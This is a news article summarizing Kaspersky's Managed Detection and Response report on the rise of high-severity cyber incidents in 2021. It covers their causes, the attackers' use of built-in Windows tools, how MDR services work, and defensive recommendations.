Recently, a cybersecurity firm has revealed that the share of critical incidents experienced by organizations increased from one in ten (9%) in 2020 to one-in-seven (14%) in 2021.
Organizations across all industries had high-severity incidents between 2021 and 2022, with most verticals experiencing multiple types. According to Kaspersky’s Managed Detection and Response (MDR) report, the most frequent causes of critical incidents remained the same as the previous year, with targeted attacks accounting for the biggest share (40.7 percent). Malware with a critical impact was found in 14 percent of cases, and a little less than 13 percent of high-severity incidents were classified as exploiting publicly exposed critical cybersecurity vulnerabilities. Social engineering was also a significant threat, accounting for over 5.5 percent of all incidents.
Targeted attacks were detected in each of the research’s verticals in 2021, with the exception of education and mass media, where there were recorded incidents of targeted attacks within media organizations. The government, industrial, IT, and financial verticals had the highest number of human-driven attacks.
High-severity incidents are distinguished by the widespread use of non-malicious Living-off-the-Land (LotL) binaries that are already present in a targeted system. These tools enable hackers to conceal their activities and reduce the likelihood of being identified during the initial stages of an cyberattack. Additionally, along with widely used tools rundll32.exe, powershell.exe and cmd.exe, cybersecurity tools such as reg.exe, te.exe, and certutil.exe are frequently used in critical incidents. Organizations can use services that conduct ethical offensive exercises to better prepare themselves against targeted attacks. This activity involves simulating complicated adversarial attacks in order to assess a company’s cyber-resilience. This was only used in 16 percent of enterprises, according to Kaspersky’s MDR analysts.
Working of MDR
MDR remotely monitors, detects, and responds to cybersecurity threats within your workplace. The visibility into security events on the endpoint is provided by an Endpoint Detection and Response (EDR) tool. Relevant threat information, advanced analytics, and forensic data are passed to human analysts who triage on alerts and determine the appropriate response to minimize the impact and risk of positive incidents.
Finally, the threat is eradicated and the impacted endpoint is restored to its pre-infected state using a combination of human and machine capabilities.
Some of the core capabilities of an MDR are prioritization, threat hunting, investigation, guided response, and remediation.
Defending Against High-severity Cybersecurity Incidents
The following are some of the recommendations of Kaspersky to defend against advanced cyberattacks
* Implement a solution that combines detection and response capabilities with managed threat hunting to help identify both known and unknown threats without requiring additional in-house resources. For reacting to modern threats, an alert-driven approach is no longer effective.
* To ensure in-depth visibility into cyber threats targeting the organization, provide the SOC teams with access to the latest threat intelligence.
* To strengthen the expertise of your in-house digital forensics and incident response team, implement expert Incident Response training. This will make it easier to verify and handle threats swiftly, as well as reduce the incident impact.
* Provide personnel with essential cybersecurity expertise to reduce the possibility of targeted attacks. Even in high-severity incidents, social engineering is still often used.
Sergey Soldatov, Head of Security Operations Center, Kaspersky, said that “The MDR report once again shows that sophisticated attacks are here to stay, and more and more organizations are facing critical incidents. Last year, Kaspersky analysts managed to reduce this indicator from 52.6 minutes in 2020 to 41.4 minutes. This was achieved by adding more incident card templates, and introduction of new telemetry enrichments that speed up triage,”